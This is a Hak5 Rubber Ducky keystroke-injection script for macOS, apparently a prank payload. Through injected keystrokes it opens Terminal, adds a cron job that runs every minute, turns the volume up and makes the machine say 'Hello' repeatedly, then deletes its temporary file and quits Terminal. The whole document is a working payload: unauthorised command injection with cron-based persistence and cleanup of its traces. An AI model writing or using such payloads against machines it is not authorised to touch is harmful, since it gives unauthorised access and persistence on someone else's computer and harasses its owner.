REM Author: Erik Owen
REM Description: This script sets a cronjob that runs every minute. The cronjob turns the volume up and says hello repeatedly.
REM Credits: Hak5 Rubber Ducky
REM ----------------------------------------------------------------
DELAY 300
REM ------------------------ Open Terminal -------------------------
GUI SPACE
STRING terminal
DELAY 300
ENTER
DELAY 500
REM ------------------------ Save any CronJobs -------------------------
STRING crontab -l > current_cron
DELAY 250
ENTER
DELAY 250
REM ------------------------ Adding New CronJob -------------------------
STRING echo "* * * * * osascript -e \"set Volume 7\" && for run in {1..51}; do /usr/bin/say -v Daniel \"Hello\" > /dev/null; done" >> current_cron
DELAY 500
ENTER
DELAY 250
REM ------------------------ Saving CronTab -------------------------
STRING crontab current_cron
DELAY 250
ENTER
DELAY 250
REM ------------------------ Cleaning Up -------------------------
STRING rm current_cron
DELAY 250
ENTER
DELAY 300
ENTER
COMMAND Q